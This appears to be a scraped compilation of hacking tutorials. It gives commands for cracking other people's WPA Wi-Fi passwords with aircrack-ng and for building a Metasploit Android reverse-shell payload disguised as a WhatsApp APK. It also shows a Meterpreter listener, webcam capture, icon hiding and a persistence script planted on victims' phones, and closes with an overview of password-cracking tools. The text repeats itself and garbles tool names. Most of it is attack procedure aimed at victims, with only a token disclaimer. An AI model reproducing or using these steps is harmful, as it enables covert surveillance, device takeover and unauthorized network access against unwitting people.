hack wifi password kali android How To – hack Wifi password with (ANDROID) Hello guys, Now a days, everyone wants to know how to hack wifi passwords in order to gain access to nearest protected wifi networks. There are simple methods which can help you hack a wifi password but they do not help you hack each and every wifi networks. If you use WPS WPA TESTER app to hack a wifi password then it only allows you to hack only some wifi networks. Wpsin has the same problem. Hence today i am going to tell you the method to hack any wifi password with your android. For this your android device must be rooted. HOW TO HACK ANY WIFI PASSWORD WITH YOUR ANDROID. So fellas, here i am telling you the method to hack any wifi password with your android. The tool we will use in this process is KALI LINUX . We will use Kali linux here to hack wifi passwords. Your requirements:- Kali linux or any linux system installed on your device with aircrack-ng suite installed. If you do not have aircrack-ng suite inatalled the get it by entering this command in terminalsudo apt-get install aircrack-ng. You should have a wire less network adapter that must support monitor mode like. a- Alfa 2W AWUS036NH b- Alfa AWUS036H c- wifiy-city 56G. 3- a word list comprising of all the possible different combination of pass-phrases. NOW THE METHOD OF CRACKING THE PASSWORD STARTS:- I am using wifiy-city56G card on Kali linux sana. Open your terminals and write ifconfig. this will display you all the networking interfaces that are connected to your device. If your wireless network adapter is working fine you should see the ” wlan0 ” the name may change if you have more then one connected wireless adapter. To start monitor mode type – airmon-ng start wlan0. After giving this command we started the monitor mode. as we know that the monitor mode is working under wlan0mon , so this is your card name for now in the red area a list of process id’s that cause trouble during the process so kill those processes by typing- ” Kill ” Here i will type- kill765 986 1090 1201 1081. Now type ifconfig and this will display the newly set monitoring interface i.e, wlan0mon . in most case it will be mon0 . to show list of available WiFi network type. >> airodump-ng will start capturing all packets and from the captured packets. Select your target and note its ‘bssid’ (bssid = base service set identifier) and channel then stop the capture using “Ctrl +c“. Start capturing the packets of your victim wifi network by typing. airodump-ng -c -w –bssid wlan0mon. In the bssid field type the bssid you noted in above step. this will start the capturing of packets. >>and if you get the handshake you wont need the aireplay command… if you don’t get the handshake yet while the capturing of packets goes on, open a new terminal as root and type— aireplay-ng -0 0 -a mon0. aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon. after few seconds stop it using Ctrl+c. now after we have successful captured the wpa handshake. 5) Stop the capturing using cntrl +c and type “ls” that would bring up all the current directories and files. Select the file with “.cap“extension and type the following command. In my case – aircrack-ng -w /usr/share/ wordlists/more_than_8.txt ********-01.cap. For the Wordlist Check this Post Best Password dictionary Now it starts finding suitable passphrase. and now all you have to do is wait till you see the lovely news ( KEY Found ( your key is here ). Yahooo you have hacked the wifi nerwork. So guys here is the method to hack wifi network. Do not misuse this post. This post is just for educational purposes. If you like this post, please share with your friends… MUST WATCH THIS VIDEO ABOUT HOW YOU CAN CREATE VIRUS WITH ANDROID. How To Hack Android Phone Remotely Using Kali Linux. Those who visit our site, already know how to hack android phone remotely using Spynote RAT. If you doesn’t know about this go to below link to learn it because it’s very easy. In this tutorial, we will learn how to hack android phone remotely using kali linux make it persistent. But now, we will use Metasploit framework in Kali Linux to hack and compromise the android device. So, without wasting too much time let’s start. How To Hack Android Phone Remotely. Step 1- Open terminal in Kali Linux. Type ifconfig and note down your ip address. If your victim is in the same network in which you are, you need to use this ip address as lhost while creating payload and setting up listener. If your victim is on the internet, you need to do port forwarding for this using your router. If you do not have a router and wants to make port forwarding task very easy using portmap.io, read this. Step 2- First, we will create our payload to deliver to android device, so use below command and press enter. msfvenom -p android/meterpreter/reverse_tcp lhost=your_ip lport=your_port -o /root/Desktop/WhatsApp.apk. It will create a new payload in apk format on desktop with name WhatsApp. You need to use your ip address in lhost and your port in lport. If you are using portmap.io site for port forwarding use port number given by portmap.io site in lport field. Step 3- Now we need to deliver and install payload apk file in our victim’s phone and setup a listener in msfconsole. So, open terminal use these commands step by step. msfconsole. use exploit/multi/handler. set PAYLOAD android/meterpreter/reverse_tcp. set LHOST ip_address_that_you_used. set LPORT port. exploit. Replace port with the port number in your system that you forwarded in your system or on portmap.io site. Step 4- All we need to do now, is wait for the victim to our app. As soon as, our victim opens the app, we will get meterpreter session in our console. Use help command and press to get list of all the commands. Use webcam_snap command to capture photos from camera. Use hide_app_icon command to hide icon of our payload app from menu. Make Our Payload Persistence. Ohkay! Now we have another problem. Whenever our victim stops our payload from running we need to again start the payload in order to receive the connection. But luckily we have a solution for this problem. We will create an autostart script and deploy it in storage of victim’s phone, just after we get meterpreter session. First, we need to create our script. So, open notepad and type following code in it. #!/bin/bash. while : do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity. sleep 20. done. Save this notepad file as autostart.sh , you can use any name but you need to use .sh at the end of file name as file extension. Save it on Desktop. Now, just after getting the meterpreter session, we need to upload this script to victim’s phone and execute it. So, follow my instructions. upload /root/Desktop/autostart.sh /sdcard/ Our file has been uploaded to victim’s smart phone. It’s time to execute it. We will do this using shell and commands in meterpreter session. shell. It will drop a shell in system. We need to go to sdcard to execute script. After navigating to sdcard, use ls command to check if your script is there or not. Execute script using below command. sh autostart.sh. There’s a limitation of this persistence method, it will work only until the victim reboot their phone. You can make it work even after reboot, but victim’s smartphone must be rooted for this. So assuming that victim’s smartphone is rooted, let’s make our payload persistence even after reboot. Use these commands step by step to do this. cd / cd /etc/init.d/ upload autostart.sh. sh autostart.sh. In short, we need to upload the script in /etc/init.d/ folder which is available in root directory and then execute our script. Our two tutorials about how to hack android phone remotely are completed. More are coming, using this kali linux method you can get some more control over compromised phone. Turn Android into Hacking Machine using Kali Linux without Root. Your Android phone can turn into a hacking device with just a few steps, having the ability to run tools like Nmap, Nikto, Netcat, and more without rooting the device. This article will teach you how you can run a hacking on your Android phone by using an application UserLAnd. This app is developed by UserLAnd Technologies to install Linux distributions on Android phones without any rooting. The app is available on the play store and is completely free. This application makes it possible to run the ARM64 operating system with the current Android OS. The ARM architecture is the same used by the Kali Linux Raspberry Pi ARM images, which makes it easy to import Kali’s tool repository. Moreover, UserLAnd developers added a feature i.e. a dedicated Kali filesystem to import all necessaries repositories easily. Still, we can not neglect the fact that UserLAnd is not an old project, and it might be possible that some tools like Nmap would break while executing several commands. The good news is their technical team is continuously working on resolving these issues. Table of Contents. How UserLAnd Works? This application utilizes custom executables that allow creating the Debian and filesystems. One of the examples is PRoot which is open- source software that mimics the functionalities like chroot. PRoot will enable us to run code with an alternative root directory. In UserLAnd, PRoot is running in the background. Installing the UserLAnd Application. You have to install it from there. Creating a Filesystem. After completing the installation process, open UserLAnd and hit the “Apps” tab. From where you need to select “Kali” or “Debian”. Create a Username. After selecting a distribution, few permissions would be required to permit. Then you need to add a username, password, and a VNC password. The password will get you access to the SSH server after installing the filesystem. The “VNC password” will not use in this tutorial. Still, we need to fill this field. Select a connection type. In our case, we will select SSH. And now, it will take some time to download the necessary executables and scripts from its GitHub repository. As soon as the unpacking of Kali Linux files is complete, we can create a Kali Linux instance and can communicate with it via SSH. Run Kali Linux on Your Android Phone. You need to enter your password. Now I am in Kali in UserLAnd and successfully loaded the Kali system on my Android phone. At this point, if I try some basic commands like ‘ifconfig’ it does not work! The reason is its installation process is already long with how many files it needs to download, so trying to get everything all at once is not going to work. What you need to do is update and upgrade all the packages from the Kali repository. $ sudo apt-get update && apt upgrade. After completing this process, now hit any command like ‘ifconfig’, and it will work fine. The filesystem in this device is limited and does not include several packages by default. You can install tools and packages of your choice like , nano, curl, screen, wget, etc. All you have to do is type the command: $ Sudo apt-get install [Package_name] These packages help you to turn your Android phone into a high-tech hacking device. Kali Linux Repository Error Fixed. Ok, so many times we have experienced this error in which apt-update and update-upgrade will not work when you freshly installed Kali Linux in your device. I have experienced the same error, I was unable to install any packages and could not connect to the Kali Linux repository. Whenever I try to update packages and connect to Kali repository I encountered errors like “temporary failure resolving ‘http.kali.org'” or “E : Unable to Locate Package” . This error occurs generally due to the repository error i.e. “sources.list” file is either blank or is set up with a dead repository. To fix this error all you need to do is browse the official website of Kali and search for Kali Network Repositories (/etc/apt/sources.list). you can browse this webpage from the link: https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/ They have shown that what entry should be present in your sources.list file. ​If the entry doesn’t exactly match up to the suggested entry, you may not be able to install any new additional packages or receive updates. Kali Linux has different branches to choose from (take your time to read which one would be the best option for your setup), and you may be able to switch or include additional repositories.​kali-rolling that are frequently updated). I have used the following command to fix that error: $ echo “deb http://http.kali.org/kali kali-rolling main non-free contrib” | sudo tee /etc/apt/sources.list. After hitting the command, try to execute an apt-update and upgrade command, and it will work. Wrapping Up The Article. We have seen in this article how you can run Kali Linux OS on your Android phones and turned them into hacking devices just by installing a free app UserLAnd. After setting up the Kali environment in your Android phone, you can learn how to hack websites, Wi-Fi passwords, and Windows 10. One thing that we need to keep in mind that the UserLAnd does have limitations. Without root access, Android’s Wi-Fi interface can’t be switched into monitor mode, so traditional Wi-Fi hacking tools like Aircrack-ng won’t work. However, there’s still a lot that can be done with UserLAnd. Users find it more convenient to hit commands with a touch screen, no ads, so the application looks clean, and the performance can be maximal. The most important factor you do not need to root your Android device to run the basic operations of Kali. How to Hack Wi-Fi Passwords by Installing Kali Linux On Android. After android rooted in the event that you attempt Kali Linux on android then you can hack Wi-Fi passwords with rooted android with best Wi-Fi hacking traps for android 2017. Perused the total article to see the technique. How to Hack Wi-Fi Passwords by Installing Kali Linux On Android. Cracking WPA2Wi-Fi password is not an easy task, so now o can hack it with a click where you don’t need any software for this. Step 1 – Kali Linux or any Linux system with air crack-ng installed. a- if you don’t have air crack-ng suite get it by this commend in terminal. sudo apt-get install air crack-ng. Step 2 – a wireless network adapter that support monitor mode like. a- Alfa 2W AWUS036NH. b- Alfa AWUS036H. c-Wi-Fi y-city 56G. Step 3 – a word list comprising of all the possible different combination of pass-phrases. Now let’s get to work. I will be using Wi-Fi y-city 56G card on Kali Linux 2 Sana. Step 1) open up your terminal as root and type. this will display you all the networking interfaces that are connected to your device. If your wireless network adapter is working fine you should see the” wlan0” the name may change if you have more than one connected wireless adapter. Step 2) now to start monitor mode type. airmon-ng start wlan0. ‘airmon-ng’ is a traffic monitoring tool ‘wlan0’ is your wireless interface. after this command, we started the monitor mode. As we know that the monitor mode is working under wlan0mon, so this is your card name for now In the red area, a list of process id’s that cause trouble during the process so kill those processes by typing. So, according to me: kill 743 898 1070 1071 1081. Now type ifconfig and this will display the newly set monitoring interface i.e., wlan0mon. in most case, it will be mon0. Step 3) to show list of available Wi-Fi network type. airodump-ng is a Wi-Fi packets capturing tool wlan0mon is my monitoring interface. airodump-ng will start capturing all packets and from the captured packets. select your target and note its ‘bssid’ (bssid = base service set identifier) and channel. then stop the capture using “ctrl+c “. Step 4) Start capturing the packets of your target network type the following command. airodump-ng -c -w –bssid wlan0mon. i.e.: airodump-ng -c 2 -w Wi-Fi –bssid C0:4A:00:F0:F4:24 wlan0mon. this will start the capturing of packets. and if you get the handshake you won’t need the airplay command… if you don’t get the handshake yet. while the capturing of packets goes on, open a new terminal as root and type. airplay-ng -0 0 -a mon0. airplay-ng = tool for DE authentication, fake authentication and other packet injections, -0 = number associated for DE authentication, 0 = dearth count, -a = bssid) here we are trying to send a DE authentication request. According to me, the command looks like. airplay-ng -0 0 -a C0:4A:00: F0:F4:24 wlan0mon. After few seconds stop it using ctrl+c. Then after we have successful captured the wpa handshake. Step 5) Stop the capturing using ctrl+c and type “ls” that would bring up all the current directories and files. Select the file with “.cap “extension and type the following command. air crack-ng -w air crack-ng is a tool that helps in cracking the password. In my case the command looks like. air crack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap. For the Wordlist Check this Post Best Password dictionary. Now it starts finding suitable passphrase and now all you have to do is wait till you see the lovely news (KEY Found (your key is here) all Step in few lines. Step 1) airodump-ng wlan0mon Step 2) airodump-ng -c 9 -w Wi-Fi –bssid C4:6E: 1F:F6:34: B8 wlan0mon Step 3) airplay-ng -0 0 -a C4:6E: 1F:F6:34: B8 wlan0mon Step 4) air crack-ng -w /usr/share/wordlists/more_than_8. txt Wi-Fi -01.cap. Kali Linux - Password Cracking Tools. In this chapter, we will learn about the important password cracking tools used in Kali Linux. Hydra. Hydra is a login cracker that supports many protocols to attack ( Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP). To open it, go to Applications → Password Attacks → Online Attacks → hydra. It will open the terminal console, as shown in the following screenshot. In this case, we will brute force FTP service of metasploitable machine, which has IP We have created in Kali a word list with extension ‘lst’ in the path usr\share\wordlist\metasploit . The command will be as follows − where –V is the username and password while trying. As shown in the following screenshot, the username and password are found which are msfadmin:msfadmin. Johnny. Johnny is a GUI for the John the Ripper password cracking tool. Generally, it is used for weak passwords. To open it, go to Applications → Password Attacks → johnny. In this case, we will get the password of Kali machine with the following command and a file will be created on the desktop. Click “Open Passwd File” → OK and all the files will be shown as in the following screenshot. Click “Start Attack”. After the attack is complete, click the left panel at “Passwords” and the password will be unshaded. john is a command line version of Johnny GUI. To start it, open the Terminal and type “john” . In case of unshadowing the password, we need to write the following command − Rainbowcrack. The RainbowCrack software cracks hashes by rainbow table lookup. Rainbow tables are ordinary files stored on the hard disk. Generally, Rainbow tables are bought online or can be compiled with different tools. To open it, go to Applications → Password Attacks → click “rainbowcrack”. The command to crack a hash password is − SQLdict. It is a dictionary attack tool for SQL server and is very easy and basic to be used. To open it, open the terminal and type “sqldict” . It will open the following view. Under “Target IP Server”, enter the IP of the server holding the SQL. Under “Target Account”, enter the username. Then load the file with the password and click “start” until it finishes. hash-identifier. It is a tool that is used to identify types of hashes, meaning what they are being used for. For example, if I have a HASH, it can tell me if it is a Linux or windows HASH. The above screen shows that it can be a MD5 hash and it seems a Domain cached credential.